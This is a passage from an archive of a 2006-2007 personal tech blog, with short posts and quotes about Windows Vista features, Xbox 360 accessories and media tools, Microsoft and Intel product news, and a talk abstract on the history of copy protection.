History and future of copy protection. Builds on the property of asymmetry as a way of analyzing copy protection features. Defenders only need to increase cost to attackers, not build an impenetrable wall. Included a live demo of reading a C64 game and cracking its protection, as well as an intro to the Xbox 360 drive hacks. Ended with some simple recommendations for repairing the 360 hacks.
[/QUOTE]

Download the slides of the presentation from root.org

Source: www.xbox-scene.com

| Trackback | # 
 Saturday, February 10, 2007
Saturday, February 10, 2007 8:11:52 PM UTC ( EN | microsoft | tech | vista )

A great, in-depth article on Readyboost and the performance gains you can expect to see with differing amounts of RAM. Bottom line seems to be that you get substantial gains from Readyboost if your system has 512 MB or (heavens forbid) less RAM but if you are packing 1GB and above, it doesn't have much impact.

Helpful in making decisions on where to put your dollars with your new/existing system.

http://www.tgdaily.com/2007/02/08/analysis_vista_ready_boost/

| Trackback | # 
 Saturday, February 03, 2007
Saturday, February 03, 2007 12:10:49 PM UTC ( EN | microsoft | office | tech | vista )

The Microsoft Windows Mobile Device Center was officially released by Microsoft. It enables you to set up new partnerships, synchronize content and manage music, pictures and video with Windows Mobile powered devices (Windows Mobile 2003 or later). The Windows Mobile Device Center is only supported on Windows Vista.

 

Windows Mobile Device Center Features Include:

  • Streamlined setup - A simplified new partnership wizard and improved partnership management.

  • Robust synchronization - Synchronization of business-critical data such as e-mail, calendars, contacts, tasks, favorites, and files.

  • Enhanced user interface - A simple and compelling user interface helps you to quickly access critical tasks and configure your device.

  • File browsing - A new device browsing experience enables you more quickly browse files and folders and open documents on your device directly from your PC.

  • Photo management – Picture management helps you detect new photos on your Windows Mobile powered device, tag and import them to the Windows Vista Photo Gallery.

  • Media synchronization - Use Microsoft Windows Media Player to synchronize and shuffle music files on your device.

The Windows Mobile Device Center is compatible with Windows Mobile 2003 devices and later.

Download: http://www.microsoft.com/windowsmobile/devicecenter.mspx

| Trackback | # 
 Monday, January 29, 2007
Monday, January 29, 2007 11:57:14 PM UTC ( EN | microsoft | tech | vista )

The first 2 Windows Vista Ultimate Extras can now be downloaded via Vista-Update:

| Trackback | # 
 Thursday, January 25, 2007
Thursday, January 25, 2007 1:41:02 PM UTC ( coolstuff | DE | microsoft | tech )

[QUOTE]
Microsoft
hat die komplette Tool-Sammlung von Sysinternals in einer einzigen Datei zum Download bereitgestellt. Somit kann man sich das lästige Herunterladen der einzelnen Programme sparen – sofern man nicht ohnehin schon die wichtigsten Analysewerkzeuge auf der Platte hat.

Zu den Tools gehören etwa Autoruns, Diskmon, Filemon, Portmon, Regmon und der Prozessexplorer, mit denen sich die Aktivitäten eines Rechner und der darauf laufenden Anwendungen sehr gut beobachten lassen. Auch der RootkitRevealer zum Aufspüren von Rootkits gehört zu der Sammlung, nebst vielen anderen nützlichen Programmen. Allerdings fehlt neben den Nicht-Troubleshooting-Tools wie dem Bluescreen-Bildschirmschoner und dem Crash-Tool NotMyFault auch der Prozess Monitor.

Microsoft hatte das von Mark Russinovich und Bryce Cogswell gegründete Unternehmen Systinternals im Juli 2006 gekauft.

Siehe dazu auch:

(dab/c't)
[/QUOTE]

Source: http://www.heise.de/newsticker/meldung/84255

| Trackback | # 
 Thursday, January 18, 2007
Thursday, January 18, 2007 11:07:47 AM UTC ( coolstuff | EN | multimedia | tech | vista )

SideLink, from Interlink Electronics, uses both Windows SideShow and Bluetooth® wireless technologies to put control of the Windows Vista Media Center in the palm of your hand from anywhere in the home.

Developed as a remote control interface for integration into Windows Vista Media Center products, Interlink's SideLink features a 2.5" color QVGA (320 x 240 pixels) display that enables menu navigation and viewing of Media Center content directly on the remote, independent of the main computer or TV screen. With SideLink, users can select songs, schedule recordings, navigate video clips and photographs, display TV program guides and even browse recorded TV shows--all right on the remote. SideLink uses Bluetooth RF wireless technology to ensure fl awless wireless communications at ranges up to 100'.

"SideLink from Interlink Electronics is the first Media Center remote control to enable Windows Vista SideShow technology," said Bill Mitchell, corporate vice president of the Mobile Platforms Division at Microsoft Corp. "SideLink is an excellent example of how Windows SideShow technology enables new benefits for users of Windows Vista. SideLink and the new Windows Vista Media Center gadgets enable features that users of previous Media Center Editions have requested, but were not possible with a single display."

Paper: http://interlinkelectronics.com/library/media/papers/pdf/20070108a.pdf

Video Preview: http://reviews.cnet.com/SideLink_Remote/4660-12760_7-6683680.html

| Trackback | # 
 Wednesday, January 17, 2007
Wednesday, January 17, 2007 8:24:29 PM UTC ( EN | markets | SOA | tech )

IBM on Monday is due to officially announce the first two in a planned series of eight centers around the world designed to help build up local expertise in the service-oriented architecture (SOA) approach to IT development.

The move to create so-called SOA Leadership Centers is in response to customer demand, according to Jason Weisser, vice president and chief technology officer of IBM's SOA advance technology. While IBM has already established centers in China and India focused on developing reusable industry-specific Web services, what users would like more help with is SOA education and training.

These are the eight planed centers:

  1. The first center to open is in Dubai Internet City (United Arab Emirates)
  2. Opening in March or April will be another center in La Gaude, France
  3. In March or April the auto makers Nissan, Toyota and Honda approached IBM to set up a center in Japan

    IBM is also looking to open four other centers:
  4. one will be in Australia,
  5. two in China, in Beijing and
  6. Shanghai respectively and
  7. in Central Europe, most likely Romania or the Czech Republic.

IBM would hope to have most of the centers open by the end of June. At present, the vendor has no plans for any other centers. "We'll plant the seed and see how well it grows," Weisser said.

Where is SOA as a technology? "SOA is past the infant stage," Weisser said. "It's probably into aggressive crawling." Walking is one to two years off, but SOA may move straight from "aggressive crawling to aggressive walking," he added.

Source: http://www.infoworld.com/article/07/01/16/HNibmcommunitysoa_1.html?source=NLC-WS2007-01-17

| Trackback | # 
 Monday, January 08, 2007
Monday, January 08, 2007 5:53:02 PM UTC ( EN | games | internet | markets | microsoft | multimedia | tech | vista | xbox )

The Consumer Electronics Show Conference is over now.

Here's a video of the CES Keynote that was quickly encoded and uploaded to google video.

 

It's the complete keynote (over 1 hour, which includes Bill Gates Keynote and a part hosted by Robbie Bach from Microsoft's Entertainment Division, who tells you everything about the Xbox360 including the IPTV demo toward the end of the video).

Microsoft will release a high-quality video of the complete keynote very soon here.

Engadget has some high-res pictures of the Xbox360 IPTV interface.

Xbox-Scene has 2 press releases and a LIVE coverage of Bill Gates' Keynote at CES 2007.

| Trackback | # 
 Thursday, January 04, 2007
Thursday, January 04, 2007 12:53:45 PM UTC ( EN | markets | microsoft | tech )

Intel offered some brief information (on the Intel Developer Forum) on its upcoming Santa Rosa platform and its associated Robson technology:

Along with 802.11n support and a new chipset (965GM), Intel's next-generation Centrino (codenamed Santa Rosa) will for the first time incorporate Intel NAND flash as a supported part of the platform. With software support from Windows Vista, Intel's Robson technology will allow notebook makers to utilize a small amount of NAND flash memory as a disk cache and/or extra virtual memory to improve performance.

Windows Vista supports two technologies that are taken advantage of by Intel's Robson (NAND flash in a notebook) technology: Windows ReadyDrive and Windows ReadyBoost.

Windows ReadyDrive is the marketing name for Vista's support for disk caching to NAND flash devices. The idea here is that ReadyDrive can cache frequently used OS and application data to a NAND flash device in order to speed up OS boot time and application load time.

Windows ReadyBoost on the other hand is designed to increase performance of systems that don't have much system memory but do have access to external flash based storage devices (e.g. USB drives). ReadyBoost will use these drives as additional virtual memory and swap to them when it runs out of main memory, which will obviously improve performance vs. simply going to disk.

ReadyBoost is really only targeted to systems with 512MB of memory that won't be upgraded (e.g. corporate desktops that you can't just stick more memory in without approval from IT), since you'd get better performance out of simply installing more memory in the system rather than relying on external flash devices as swap drives. These external flash drives have to be Vista certified in order to work with ReadyBoost (they mainly have to support a minimum read/write speed), but the performance improvement here would really only be seen on systems without sufficient main memory.

Windows ReadyDrive however can result in a significant performance increase as it acts as a cache, closing the gap between main memory and hard disk performance. Intel has been touting very tangible reductions in resume from hibernate time as well as application launch time thanks to ReadyDrive.

Intel's Robson technology is simply Intel's solution for both ReadyDrive and ReadyBoost; using a single Intel card (either in a Express Card slot or on the motherboard itself), Intel can support both ReadyDrive and ReadyBoost (although the latter isn't as important if you have enough main memory).

While you can take advantage of ReadyDrive with a hybrid hard drive, Intel obviously views the motherboard level integration of Robson technology as the best option.

Currently Intel expects the mainstream target for Robson NAND flash to be 1GB, although higher performance alternatives would definitely be larger. In order to take advantage of both ReadyDrive and ReadyBoost, you'd have to have a Robson card equipped with two flash devices, otherwise you can only support one. Assuming it's upgradable, Intel's Robson approach makes a lot of sense since it would be a lot cheaper to simply replace a flash card in your system rather than upgrading your hard drive everytime you wanted more flash for ReadyDrive.

Although it's not a required part of the Santa Rosa platform, Intel is expecting many OEMs to take advantage of Robson technology and we will see it introduced next year alongside Vista and the new Centrino notebooks.

Source and more Info's: http://www.anandtech.com/tradeshows/showdoc.aspx?i=2841&p=3

| Trackback | # 
 Tuesday, January 02, 2007
Tuesday, January 02, 2007 9:15:05 AM UTC ( coolstuff | EN | markets | microsoft | multimedia | office | tech )
The 20 Most Innovative Products of the Year 2006
| Trackback | # 
 Monday, January 01, 2007
Monday, January 01, 2007 2:18:26 PM UTC ( EN | markets | multimedia | tech | xbox )

[QUOTE]
So the "next gen" format war is upon us with two sides lined up, ready to take your money for your fourth version of Full Metal Jacket (I can't believe that you actually got it on Laser Disk...what were you thinking). If you are like most people, you are wondering a couple of things, the first being why would I want to buy another version of Full Metal Jacket, and is the $200 add on drive for the 360 worth the money, especially if I already have the PS3? More importantly, which one of the two (the PS3 or 360 HD DVD drive )looks and performs better. This article will attempt to answer these questions with background and information, as well as present evidence to why the ultimate conclusion was reached.

Overall this test was to see what next gen game system player is superior, and based on these tests, I would have to say that the 360 add on is the clear winner. Movies on the Blu Ray do look great, but with color levels that are more even allowing for greater levels of clarity, HD DVD just looks better, even over component cables.
[/QUOTE]

Full Story: gamescentral.com

| Trackback | # 
 Thursday, December 28, 2006
Thursday, December 28, 2006 1:16:58 PM UTC ( coding | EN | multimedia | tech )
HD-DVD AACS DRM Cracked?
| Trackback | # 
 Monday, December 18, 2006
Monday, December 18, 2006 12:28:25 PM UTC ( tech | vista )
Installing Windows XP after Vista
| Trackback | # 
 Wednesday, December 13, 2006
Wednesday, December 13, 2006 7:54:54 PM UTC ( coolstuff | EN | tech )


(klick on the pic to zoom in!)

Found on: www.schrankmonster.de
Source: www.xkcd.com

| Trackback | # 
Wednesday, December 13, 2006 5:32:41 PM UTC ( coolstuff | EN | tech | vista | xbox )

James B. worked on Runtime's Transcode 360 (info) to port it to .NET v2.0 and make it work correctly under Windows Vista's Media Center (32 and 64bit):

[QUOTE]
Transcode 360 version 4.6 has been released today, this version is purely for Windows Vista users and is the foundation for the next few months of T360 development.

Carrying on from the magnificent work that Runtime 360 started, I have picked up the torch and bought T360 up to date and forward in to the Vista generation. At present there are no new features in this version it is the foundation release which allows it to run natively and error free on Windows Vista RTM and resolves several critical issues on the new operating system.

Please ensure you uninstall any older versions of Transcode 360 prior to installing this version. This is version 4.6 and is purely for Windows Vista (please don't try to install on MCE 2005).

The configuration at present is to use port 1401 (please don't change this).

UPDATE: I have removed the helper for opening the ports on your firewall until I can get it working with 64 bit windows and it stops crashing the installer, for now if you are running Vista for 32 bit you will need to click the link in your start menu to open the ports required for T360, for 64 bit Vista you will need to do this manually. The port required for T360 is 1401 and ensure Transcode306.exe and Transcode360Tray.exe to the allowed applications.

Fixed Issues
* This is a native .net application for Windows Vista and has been compiled on a Windows Vista PC, it does not require any .net downloads to be performed before installation.
* Stuttering - This appears to now be fixed on my 2 test PCs (1 dev and 1 live), the issue appears to have been a Mencoder issue and upgrading to RC1 repaired the problems.
* Weird errors - As many faults that I could find on the board relating to Vista have been fixed, errors such as invalid application, null object reference and transcode error have been fixed.
* You can now run the application in the recommended tray icon mode instead of being forced to use the service account under Windows Vista as you did on the previous version.
* Firewall utillities - The installer will run a helper application called openfirewall and closefirewall depending on if you are installing or uninstalling the application. If you have any problems please go to Program Files\Transcode360\Registration and run the application manually, once done check your firewall configuration to check they have taken effect.

Known Issues (features):
* The Transcode button no longer has the icon to show that you are transcoding, your video still transcodes if you leave it for about 5 seconds after clicking the button you will get the spinning wait symbol and your video will play.
* If UAC is switched on you might have to go to program files\transcode360 and right click transcode360.exe and transcode360tray.exe and go to the compatibility tab and tick run as administrator, I intend to fix this in the next release by ensuring T360 doesn't use the HKEY_LOCAL_MACHINE registry keys which should resolve the issue.
* On startup of the tray icon please ensure you say yes to unblocking the application.
* The configuration at present is to use port 1401 (please don't change) and to install to c:\program files\transcode360. If you change the location you will need to edit the configuration file from the start menu and ensure the locations are correct.

Any problems please post, remember this is a beta and my first release of T360!
[/QUOTE]

Official Site: n/a, by James B. (Transcode360 originally by Runtime)
Download: here
Source: http://www.xbox-scene.com/xbox1data/sep/EEyVAlAuuymnoFRaUP.php

| Trackback | # 
Wednesday, December 13, 2006 2:00:05 PM UTC ( EN | microsoft | science | tech )

Moving with the stealth and style of a startup, mighty Microsoft Corp. today has released a point-and-click software tool designed to make it easier to program simple robots.

[QUOTE]
REDMOND, Wash. — Dec. 12, 2006 — Among the many remarkable innovations emerging out of the robotics industry, from surveillance robots that can defuse roadside bombs to robotic arms that perform surgeries, one persistent challenge has been the lack of a common development platform that would allow developers to easily create robotic applications for varied hardware platforms. Today, Microsoft Corp. is closing this gap with the release of Microsoft® Robotics Studio, a new Windows®-based development environment for creating robotic software for a wide variety of hardware platforms. Microsoft also introduced a new third-party partner program featuring Microsoft Robotics Studio-enabled applications, services and robots from independent software vendors, service providers, hardware component vendors and robot manufacturers. Already more than 30 third-party companies have pledged support for the new robotics development and runtime platform, which is available for download and evaluation at http://microsoft.com/robotics.
[/QUOTE]

Source: http://www.microsoft.com/presspass/press/2006/dec06/12-12MSRoboticsStudioAvailablePR.mspx

| Trackback | # 
 Tuesday, December 12, 2006
Tuesday, December 12, 2006 11:20:13 AM UTC ( coding | coolstuff | EN | games | microsoft | tech | xbox )
XNA Game Studio Express
| Trackback | # 
 Saturday, December 09, 2006
Saturday, December 09, 2006 12:40:44 PM UTC ( EN | microsoft | office | tech )
Office Open XML format became Ecma Standard
| Trackback | # 
Saturday, December 09, 2006 12:32:21 PM UTC ( coding | EN | tech | xbox )
XBox vs. PS3
| Trackback | # 
Saturday, December 09, 2006 12:28:45 PM UTC ( coding | EN | microsoft | SOA | tech )
Microsoft SOA
| Trackback | # 
 Thursday, December 07, 2006
Thursday, December 07, 2006 1:01:37 PM UTC ( DE | society | tech )
BKA Trojaner
| Trackback | # 
 Monday, December 04, 2006
Monday, December 04, 2006 11:45:06 PM UTC ( coding | EN | tech | xbox )
| Trackback | # 
 Thursday, November 30, 2006
Thursday, November 30, 2006 4:07:54 PM UTC ( EN | microsoft | tech | xbox )
XBOX 360 HD-DVD Drive
| Trackback | # 
Thursday, November 30, 2006 1:33:17 PM UTC ( coolstuff | EN | tech | xbox )
WMV Encoder for the XBox 360
| Trackback | # 
Thursday, November 30, 2006 1:03:00 PM UTC ( EN | markets | microsoft | tech )
 Tuesday, November 28, 2006
Tuesday, November 28, 2006 11:47:27 PM UTC ( EN | science | tech )
SPAM statistic
| Trackback | # 
 Monday, November 27, 2006
Monday, November 27, 2006 11:06:07 PM UTC ( coolstuff | EN | tech | xbox )
XBOX 360 Transcoder
| Trackback | # 
 Wednesday, November 22, 2006
Wednesday, November 22, 2006 7:54:29 PM UTC ( EN | tech | xbox )
XCM XFPS 360
| Trackback | # 
Wednesday, November 22, 2006 12:58:44 PM UTC ( DE | tech )
ReadyBoost USB Stick
| Trackback | # 
 Sunday, November 19, 2006
Sunday, November 19, 2006 11:32:36 PM UTC ( EN | microsoft | office | tech | vista )
vista build, office build
| Trackback | # 
 Saturday, November 18, 2006
Saturday, November 18, 2006 6:09:52 PM UTC ( coolstuff | EN | tech | xbox )
XCM XFPS 360 Adapter for XBOX 360
| Trackback | # 
 Thursday, November 16, 2006
Thursday, November 16, 2006 2:17:15 PM UTC ( EN | tech )
| Trackback | # 
 Tuesday, November 07, 2006
Tuesday, November 07, 2006 12:45:26 PM UTC ( EN | microsoft | tech | vista )
Vista, special folder,
| Trackback | # 
 Monday, November 06, 2006
Monday, November 06, 2006 11:21:36 PM UTC ( coolstuff | EN | microsoft | tech )
virtual earth, microsoft
| Trackback | # 
Monday, November 06, 2006 4:42:00 PM UTC ( EN | microsoft | tech )
office, microsoft
| Trackback | # 
 Wednesday, November 01, 2006
Wednesday, November 01, 2006 1:19:24 PM UTC ( EN | microsoft | office | tech | vista )
vista and office2007 packaging
| Trackback | # 
 Saturday, October 28, 2006
Saturday, October 28, 2006 12:29:57 PM UTC ( coolstuff | EN | tech )
| Trackback | #